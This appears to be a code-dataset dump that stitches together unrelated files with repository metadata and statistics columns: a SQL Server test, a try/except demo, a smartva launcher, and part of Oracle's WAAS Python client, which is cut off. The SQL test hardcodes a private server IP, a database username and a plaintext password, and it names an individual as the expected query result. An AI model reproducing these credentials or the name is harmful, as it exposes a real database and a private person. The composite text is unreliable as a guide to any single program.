2018-02-21T21:29:52.000Z
|
tests/features/test_sqlserver.py
|
alexgarzao/beeweb
|
c67d024c2d43c6bb2da7ba6877c1648e8760f036
|
[
"MIT"
] | 1
|
2018-04-22T00:08:16.000Z
|
2018-04-22T00:08:16.000Z
|
tests/features/test_sqlserver.py
|
alexgarzao/beeweb
|
c67d024c2d43c6bb2da7ba6877c1648e8760f036
|
[
"MIT"
] | 2
|
2017-11-10T17:06:34.000Z
|
2017-11-11T03:27:46.000Z
|
from .context import SqlServer
def test_query_with_many_fields():
    """A three-column SELECT: field_name picks which column query() returns."""
    # NOTE(review): server address and credentials are hardcoded; this test
    # only passes against that specific, reachable SQL Server instance.
    query = SqlServer()
    for attribute, value in (
            ('server_address', '10.64.100.213'),
            ('username', 'cob_user'),
            ('user_password', 'tecnocred'),
            ('database_name', 'COB_IS_3')):
        setattr(query, attribute, value)
    query.sql = """
SELECT top 1 ben.nm_beneficiario, vc.ds_variacao_carteira, c.ds_carteira
FROM cob_variacao_carteira vc
JOIN cob_beneficiario_variacao_carteira bvc
ON (bvc.cd_variacao_carteira = vc.cd_variacao_carteira)
JOIN cob_beneficiario ben
ON (ben.cd_beneficiario = bvc.cd_beneficiario)
JOIN cob_carteira c ON (c.cd_carteira = bvc.cd_carteira)
WHERE c.id_modalidade_carteira = 10
AND ben.cd_coop = 4022
"""
    query.field_name = 'nm_beneficiario'
    assert query.query() == 'Mirian Gomes'
def test_query_with_one_field():
    """A single-column SELECT: no field_name is needed to read the result."""
    # NOTE(review): server address and credentials are hardcoded; this test
    # only passes against that specific, reachable SQL Server instance.
    query = SqlServer()
    for attribute, value in (
            ('server_address', '10.64.100.213'),
            ('username', 'cob_user'),
            ('user_password', 'tecnocred'),
            ('database_name', 'COB_IS_3')):
        setattr(query, attribute, value)
    query.sql = """
SELECT top 1 ben.nm_beneficiario
FROM cob_variacao_carteira vc
JOIN cob_beneficiario_variacao_carteira bvc
ON (bvc.cd_variacao_carteira = vc.cd_variacao_carteira)
JOIN cob_beneficiario ben
ON (ben.cd_beneficiario = bvc.cd_beneficiario)
JOIN cob_carteira c ON (c.cd_carteira = bvc.cd_carteira)
WHERE c.id_modalidade_carteira = 10
AND ben.cd_coop = 4022
"""
    assert query.query() == 'Mirian Gomes'
| 35.209302
| 78
| 0.649934
| 206
| 1,514
| 4.470874
| 0.257282
| 0.156352
| 0.078176
| 0.034745
| 0.857763
| 0.807818
| 0.807818
| 0.807818
| 0.807818
| 0.807818
| 0
| 0.032345
| 0.264861
| 1,514
| 42
| 79
| 36.047619
| 0.795148
| 0
| 0
| 0.842105
| 0
| 0
| 0.703435
| 0.184941
| 0
| 0
| 0
| 0
| 0.052632
| 1
| 0.052632
| false
| 0.052632
| 0.026316
| 0
| 0.078947
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
4530934cb88a0314da46a5b36e24ed4a92573217
| 276
|
py
|
Python
|
python/try.py
|
wjiec/packages
|
4ccaf8f717265a1f8a9af533f9a998b935efb32a
|
[
"MIT"
] | null | null | null |
python/try.py
|
wjiec/packages
|
4ccaf8f717265a1f8a9af533f9a998b935efb32a
|
[
"MIT"
] | 1
|
2016-09-15T07:06:15.000Z
|
2016-09-15T07:06:15.000Z
|
python/try.py
|
wjiec/packages
|
4ccaf8f717265a1f8a9af533f9a998b935efb32a
|
[
"MIT"
] | null | null | null |
#!/bin/env python3
# Demonstrate try/except/finally twice: first with a division that raises
# ZeroDivisionError, then with one that succeeds (the handler is skipped but
# the finally clause still runs).
for divisor in (0, 1):
    try:
        invalid = 10 / divisor
    except ZeroDivisionError as err:
        print('catch except: ', err)
    finally:
        print('finally...')
| 18.4
| 31
| 0.59058
| 33
| 276
| 4.939394
| 0.454545
| 0.122699
| 0.147239
| 0.319018
| 0.760736
| 0.760736
| 0.760736
| 0.760736
| 0.760736
| 0.760736
| 0
| 0.034483
| 0.264493
| 276
| 15
| 32
| 18.4
| 0.768473
| 0.061594
| 0
| 0.833333
| 0
| 0
| 0.195918
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.333333
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
18d16473d15ff59cf6350585ba3622682cc43a86
| 173
|
py
|
Python
|
smartva/__main__.py
|
rileyhazard/SmartVA-Analyze-1
|
0573eeff27d03f54e7506db4f1631c0cd9f54bbb
|
[
"MIT"
] | 4
|
2019-01-23T12:57:47.000Z
|
2020-04-18T17:13:08.000Z
|
smartva/__main__.py
|
rileyhazard/SmartVA-Analyze-1
|
0573eeff27d03f54e7506db4f1631c0cd9f54bbb
|
[
"MIT"
] | 4
|
2019-01-09T22:10:07.000Z
|
2022-02-16T04:57:06.000Z
|
smartva/__main__.py
|
rileyhazard/SmartVA-Analyze-1
|
0573eeff27d03f54e7506db4f1631c0cd9f54bbb
|
[
"MIT"
] | 11
|
2018-12-11T22:01:13.000Z
|
2022-01-07T11:38:02.000Z
|
import sys
if __name__ == '__main__':
    # Any command-line argument selects the CLI entry point; with no
    # arguments the UI is launched instead.
    cli_requested = len(sys.argv) > 1
    if cli_requested:
        from smartva import va_cli as app
    else:
        from smartva import va_ui as app
    app.main()
| 19.222222
| 41
| 0.612717
| 27
| 173
| 3.555556
| 0.592593
| 0.229167
| 0.354167
| 0.395833
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008333
| 0.306358
| 173
| 8
| 42
| 21.625
| 0.791667
| 0
| 0
| 0
| 0
| 0
| 0.046243
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.428571
| 0
| 0.428571
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
18f0e3a4faebcad3be13c771b1d79c841c45f250
| 372,273
|
py
|
Python
|
src/oci/waas/waas_client.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/waas/waas_client.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/waas/waas_client.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from __future__ import absolute_import
from oci._vendor import requests # noqa: F401
from oci._vendor import six
from oci import retry, circuit_breaker # noqa: F401
from oci.base_client import BaseClient
from oci.config import get_config_value_or_default, validate_config
from oci.signer import Signer
from oci.util import Sentinel, get_signer_from_authentication_type, AUTHENTICATION_TYPE_FIELD_NAME
from .models import waas_type_mapping
missing = Sentinel("Missing")
class WaasClient(object):
"""
OCI Web Application Acceleration and Security Services
"""
def __init__(self, config, **kwargs):
    """
    Creates a new service client

    :param dict config:
        Configuration keys and values as per `SDK and Tool Configuration <https://docs.cloud.oracle.com/Content/API/Concepts/sdkconfig.htm>`__.
        The :py:meth:`~oci.config.from_file` method can be used to load configuration from a file. Alternatively, a ``dict`` can be passed. You can validate_config
        the dict using :py:meth:`~oci.config.validate_config`

    :param str service_endpoint: (optional)
        The endpoint of the service to call using this client. For example ``https://iaas.us-ashburn-1.oraclecloud.com``. If this keyword argument is
        not provided then it will be derived using the region in the config parameter. You should only provide this keyword argument if you have an explicit
        need to specify a service endpoint.

    :param timeout: (optional)
        The connection and read timeouts for the client. The default values are connection timeout 10 seconds and read timeout 60 seconds. This keyword argument can be provided
        as a single float, in which case the value provided is used for both the read and connection timeouts, or as a tuple of two floats. If
        a tuple is provided then the first value is used as the connection timeout and the second value as the read timeout.
    :type timeout: float or tuple(float, float)

    :param signer: (optional)
        The signer to use when signing requests made by the service client. The default is to use a :py:class:`~oci.signer.Signer` based on the values
        provided in the config parameter.

        One use case for this parameter is for `Instance Principals authentication <https://docs.cloud.oracle.com/Content/Identity/Tasks/callingservicesfrominstances.htm>`__
        by passing an instance of :py:class:`~oci.auth.signers.InstancePrincipalsSecurityTokenSigner` as the value for this keyword argument
    :type signer: :py:class:`~oci.signer.AbstractBaseSigner`

    :param obj retry_strategy: (optional)
        A retry strategy to apply to all calls made by this service client (i.e. at the client level). There is no retry strategy applied by default.
        Retry strategies can also be applied at the operation level by passing a ``retry_strategy`` keyword argument as part of calling the operation.
        Any value provided at the operation level will override whatever is specified at the client level.

        This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
        is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.

    :param obj circuit_breaker_strategy: (optional)
        A circuit breaker strategy to apply to all calls made by this service client (i.e. at the client level).
        This client uses :py:data:`~oci.circuit_breaker.DEFAULT_CIRCUIT_BREAKER_STRATEGY` as default if no circuit breaker strategy is provided.
        The specifics of circuit breaker strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/circuit_breakers.html>`__.

    :param function circuit_breaker_callback: (optional)
        Callback function to receive any exceptions triggerred by the circuit breaker.

    :param allow_control_chars: (optional)
        allow_control_chars is a boolean to indicate whether or not this client should allow control characters in the response object. By default, the client will not
        allow control characters to be in the response object.
    """
    validate_config(config, signer=kwargs.get('signer'))
    # Signer resolution order: explicit `signer` kwarg, then an
    # authentication-type hint in the config dict, then a default key-based
    # Signer assembled from the config entries.
    if 'signer' in kwargs:
        signer = kwargs['signer']
    elif AUTHENTICATION_TYPE_FIELD_NAME in config:
        signer = get_signer_from_authentication_type(config)
    else:
        signer = Signer(
            tenancy=config["tenancy"],
            user=config["user"],
            fingerprint=config["fingerprint"],
            private_key_file_location=config.get("key_file"),
            pass_phrase=get_config_value_or_default(config, "pass_phrase"),
            private_key_content=config.get("key_content")
        )
    # Fixed service routing plus caller-tunable options forwarded to the
    # shared BaseClient transport layer.
    base_client_init_kwargs = {
        'regional_client': True,
        'service_endpoint': kwargs.get('service_endpoint'),
        'base_path': '/20181116',
        'service_endpoint_template': 'https://waas.{region}.oci.{secondLevelDomain}',
        'skip_deserialization': kwargs.get('skip_deserialization', False),
        'circuit_breaker_strategy': kwargs.get('circuit_breaker_strategy', circuit_breaker.GLOBAL_CIRCUIT_BREAKER_STRATEGY)
    }
    if 'timeout' in kwargs:
        base_client_init_kwargs['timeout'] = kwargs.get('timeout')
    # An explicit circuit_breaker_strategy=None kwarg falls back to the
    # module default rather than disabling the breaker.
    if base_client_init_kwargs.get('circuit_breaker_strategy') is None:
        base_client_init_kwargs['circuit_breaker_strategy'] = circuit_breaker.DEFAULT_CIRCUIT_BREAKER_STRATEGY
    if 'allow_control_chars' in kwargs:
        base_client_init_kwargs['allow_control_chars'] = kwargs.get('allow_control_chars')
    self.base_client = BaseClient("waas", config, signer, waas_type_mapping, **base_client_init_kwargs)
    # Client-level retry/callback settings; individual operations may
    # override retry_strategy per call.
    self.retry_strategy = kwargs.get('retry_strategy')
    self.circuit_breaker_callback = kwargs.get('circuit_breaker_callback')
def accept_recommendations(self, waas_policy_id, protection_rule_keys, **kwargs):
    """
    Accepts a list of recommended Web Application Firewall protection rules. Web Application Firewall protection rule recommendations are sets of rules generated by observed traffic patterns through the Web Application Firewall and are meant to optimize the Web Application Firewall's security profile. Only the rules specified in the request body will be updated; all other rules will remain unchanged.

    Use the `GET /waasPolicies/{waasPolicyId}/wafConfig/recommendations` method to view a list of recommended Web Application Firewall protection rules. For more information, see `WAF Protection Rules`__.

    __ https://docs.cloud.oracle.com/iaas/Content/WAF/Tasks/wafprotectionrules.htm

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param list[str] protection_rule_keys: (required)

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.

    :param str if_match: (optional)
        For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.

        This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
        The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.

        To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.

    :param bool allow_control_chars: (optional)
        allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
        By default, the response will not allow control characters in strings

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/accept_recommendations.py.html>`__ to see an example of how to use accept_recommendations API.
    """
    resource_path = "/waasPolicies/{waasPolicyId}/actions/acceptWafConfigRecommendations"
    method = "POST"

    # Don't accept unknown kwargs
    expected_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "if_match"
    ]
    extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
    if extra_kwargs:
        raise ValueError(
            "accept_recommendations got unknown kwargs: {!r}".format(extra_kwargs))

    path_params = {
        "waasPolicyId": waas_policy_id
    }

    # Drop unsupplied (sentinel) values, then reject empty/blank path params
    # outright -- they would produce a malformed URL.
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}

    for (k, v) in six.iteritems(path_params):
        if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))

    # Optional headers default to the `missing` sentinel and are filtered
    # out below so they are only sent when the caller supplied them.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing),
        "if-match": kwargs.get("if_match", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    # Operation-level retry_strategy overrides the client-level one.
    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api,
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=header_params,
            body=protection_rule_keys)
    else:
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=header_params,
            body=protection_rule_keys)
def cancel_work_request(self, work_request_id, **kwargs):
    """
    Cancels a specified work request.

    :param str work_request_id: (required)
        The `OCID`__ of the work request. This number is generated when work request is created.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. Provide this ID when contacting Oracle about a particular request.

    :param str opc_retry_token: (optional)
        A token that uniquely identifies a request so it can be retried after a timeout or server error without the risk of executing the same action twice. Retry tokens expire after 24 hours, but can be invalidated earlier by conflicting operations.

    :param str if_match: (optional)
        For optimistic concurrency control. Set to the etag value from a previous `GET` or `POST` response; the resource is updated or deleted only when that etag matches its current etag.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call, overriding any strategy set at the client level. Use one of the strategies from the :py:mod:`~oci.retry` module; pass a :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether strings in the response object may contain control characters. By default they may not.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/cancel_work_request.py.html>`__ to see an example of how to use cancel_work_request API.
    """
    resource_path = "/workRequests/{workRequestId}"
    method = "DELETE"

    # Reject keyword arguments this operation does not support.
    expected_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token",
        "if_match"
    ]
    unrecognized = [name for name in six.iterkeys(kwargs) if name not in expected_kwargs]
    if unrecognized:
        raise ValueError(
            "cancel_work_request got unknown kwargs: {!r}".format(unrecognized))

    # Collect path parameters; each must be a non-empty, non-whitespace value.
    path_params = {
        "workRequestId": work_request_id
    }
    path_params = {
        name: value
        for (name, value) in six.iteritems(path_params)
        if value is not missing
    }
    for name, value in six.iteritems(path_params):
        blank = isinstance(value, six.string_types) and not value.strip()
        if value is None or blank:
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Assemble headers, then drop every optional entry the caller omitted.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing),
        "opc-retry-token": kwargs.get("opc_retry_token", missing),
        "if-match": kwargs.get("if_match", missing)
    }
    header_params = {
        name: value
        for (name, value) in six.iteritems(header_params)
        if value is not missing and value is not None
    }

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No strategy configured anywhere; issue the call directly.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=header_params)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params)
def change_address_list_compartment(self, address_list_id, change_address_list_compartment_details, **kwargs):
    """
    Moves address list into a different compartment. When provided, If-Match
    is checked against ETag values of the address list. For information about moving
    resources between compartments, see `Moving Resources to a Different Compartment`__.

    __ https://docs.cloud.oracle.com/iaas/Content/Identity/Tasks/managingcompartments.htm#moveRes

    :param str address_list_id: (required)
        The `OCID`__ of the address list. This number is generated when the address list is added to the compartment.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param oci.waas.models.ChangeAddressListCompartmentDetails change_address_list_compartment_details: (required)

    :param str if_match: (optional)
        For optimistic concurrency control. Set to the etag value from a previous `GET` or `POST` response; the resource is updated or deleted only when that etag matches its current etag.

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. Provide this ID when contacting Oracle about a particular request.

    :param str opc_retry_token: (optional)
        A token that uniquely identifies a request so it can be retried after a timeout or server error without the risk of executing the same action twice. Retry tokens expire after 24 hours, but can be invalidated earlier by conflicting operations.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call, overriding any strategy set at the client level. Use one of the strategies from the :py:mod:`~oci.retry` module; pass a :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether strings in the response object may contain control characters. By default they may not.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/change_address_list_compartment.py.html>`__ to see an example of how to use change_address_list_compartment API.
    """
    resource_path = "/addressLists/{addressListId}/actions/changeCompartment"
    method = "POST"

    # Reject keyword arguments this operation does not support.
    expected_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "if_match",
        "opc_request_id",
        "opc_retry_token"
    ]
    unrecognized = [name for name in six.iterkeys(kwargs) if name not in expected_kwargs]
    if unrecognized:
        raise ValueError(
            "change_address_list_compartment got unknown kwargs: {!r}".format(unrecognized))

    # Collect path parameters; each must be a non-empty, non-whitespace value.
    path_params = {
        "addressListId": address_list_id
    }
    path_params = {
        name: value
        for (name, value) in six.iteritems(path_params)
        if value is not missing
    }
    for name, value in six.iteritems(path_params):
        blank = isinstance(value, six.string_types) and not value.strip()
        if value is None or blank:
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Assemble headers, then drop every optional entry the caller omitted.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "if-match": kwargs.get("if_match", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing),
        "opc-retry-token": kwargs.get("opc_retry_token", missing)
    }
    header_params = {
        name: value
        for (name, value) in six.iteritems(header_params)
        if value is not missing and value is not None
    }

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No strategy configured anywhere; issue the call directly.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=header_params,
            body=change_address_list_compartment_details)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        body=change_address_list_compartment_details)
def change_certificate_compartment(self, certificate_id, change_certificate_compartment_details, **kwargs):
    """
    Moves certificate into a different compartment. When provided, If-Match is checked against ETag values of the certificate.
    For information about moving resources between compartments, see `Moving Resources to a Different Compartment`__.

    __ https://docs.cloud.oracle.com/iaas/Content/Identity/Tasks/managingcompartments.htm#moveRes

    :param str certificate_id: (required)
        The `OCID`__ of the SSL certificate used in the WAAS policy. This number is generated when the certificate is added to the policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param oci.waas.models.ChangeCertificateCompartmentDetails change_certificate_compartment_details: (required)

    :param str if_match: (optional)
        For optimistic concurrency control. Set to the etag value from a previous `GET` or `POST` response; the resource is updated or deleted only when that etag matches its current etag.

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. Provide this ID when contacting Oracle about a particular request.

    :param str opc_retry_token: (optional)
        A token that uniquely identifies a request so it can be retried after a timeout or server error without the risk of executing the same action twice. Retry tokens expire after 24 hours, but can be invalidated earlier by conflicting operations.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call, overriding any strategy set at the client level. Use one of the strategies from the :py:mod:`~oci.retry` module; pass a :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether strings in the response object may contain control characters. By default they may not.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/change_certificate_compartment.py.html>`__ to see an example of how to use change_certificate_compartment API.
    """
    resource_path = "/certificates/{certificateId}/actions/changeCompartment"
    method = "POST"

    # Reject keyword arguments this operation does not support.
    expected_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "if_match",
        "opc_request_id",
        "opc_retry_token"
    ]
    unrecognized = [name for name in six.iterkeys(kwargs) if name not in expected_kwargs]
    if unrecognized:
        raise ValueError(
            "change_certificate_compartment got unknown kwargs: {!r}".format(unrecognized))

    # Collect path parameters; each must be a non-empty, non-whitespace value.
    path_params = {
        "certificateId": certificate_id
    }
    path_params = {
        name: value
        for (name, value) in six.iteritems(path_params)
        if value is not missing
    }
    for name, value in six.iteritems(path_params):
        blank = isinstance(value, six.string_types) and not value.strip()
        if value is None or blank:
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Assemble headers, then drop every optional entry the caller omitted.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "if-match": kwargs.get("if_match", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing),
        "opc-retry-token": kwargs.get("opc_retry_token", missing)
    }
    header_params = {
        name: value
        for (name, value) in six.iteritems(header_params)
        if value is not missing and value is not None
    }

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No strategy configured anywhere; issue the call directly.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=header_params,
            body=change_certificate_compartment_details)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        body=change_certificate_compartment_details)
def change_custom_protection_rule_compartment(self, custom_protection_rule_id, change_custom_protection_rule_compartment_details, **kwargs):
    """
    Moves a custom protection rule into a different compartment within the same tenancy. When provided, If-Match is checked against ETag values of the custom protection rule. For information about moving resources between compartments, see `Moving Resources to a Different Compartment`__.

    __ https://docs.cloud.oracle.com/iaas/Content/Identity/Tasks/managingcompartments.htm#moveRes

    :param str custom_protection_rule_id: (required)
        The `OCID`__ of the custom protection rule. This number is generated when the custom protection rule is added to the compartment.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param oci.waas.models.ChangeCustomProtectionRuleCompartmentDetails change_custom_protection_rule_compartment_details: (required)

    :param str if_match: (optional)
        For optimistic concurrency control. Set to the etag value from a previous `GET` or `POST` response; the resource is updated or deleted only when that etag matches its current etag.

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. Provide this ID when contacting Oracle about a particular request.

    :param str opc_retry_token: (optional)
        A token that uniquely identifies a request so it can be retried after a timeout or server error without the risk of executing the same action twice. Retry tokens expire after 24 hours, but can be invalidated earlier by conflicting operations.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call, overriding any strategy set at the client level. Use one of the strategies from the :py:mod:`~oci.retry` module; pass a :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether strings in the response object may contain control characters. By default they may not.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/change_custom_protection_rule_compartment.py.html>`__ to see an example of how to use change_custom_protection_rule_compartment API.
    """
    resource_path = "/customProtectionRules/{customProtectionRuleId}/actions/changeCompartment"
    method = "POST"

    # Reject keyword arguments this operation does not support.
    expected_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "if_match",
        "opc_request_id",
        "opc_retry_token"
    ]
    unrecognized = [name for name in six.iterkeys(kwargs) if name not in expected_kwargs]
    if unrecognized:
        raise ValueError(
            "change_custom_protection_rule_compartment got unknown kwargs: {!r}".format(unrecognized))

    # Collect path parameters; each must be a non-empty, non-whitespace value.
    path_params = {
        "customProtectionRuleId": custom_protection_rule_id
    }
    path_params = {
        name: value
        for (name, value) in six.iteritems(path_params)
        if value is not missing
    }
    for name, value in six.iteritems(path_params):
        blank = isinstance(value, six.string_types) and not value.strip()
        if value is None or blank:
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Assemble headers, then drop every optional entry the caller omitted.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "if-match": kwargs.get("if_match", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing),
        "opc-retry-token": kwargs.get("opc_retry_token", missing)
    }
    header_params = {
        name: value
        for (name, value) in six.iteritems(header_params)
        if value is not missing and value is not None
    }

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No strategy configured anywhere; issue the call directly.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=header_params,
            body=change_custom_protection_rule_compartment_details)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        body=change_custom_protection_rule_compartment_details)
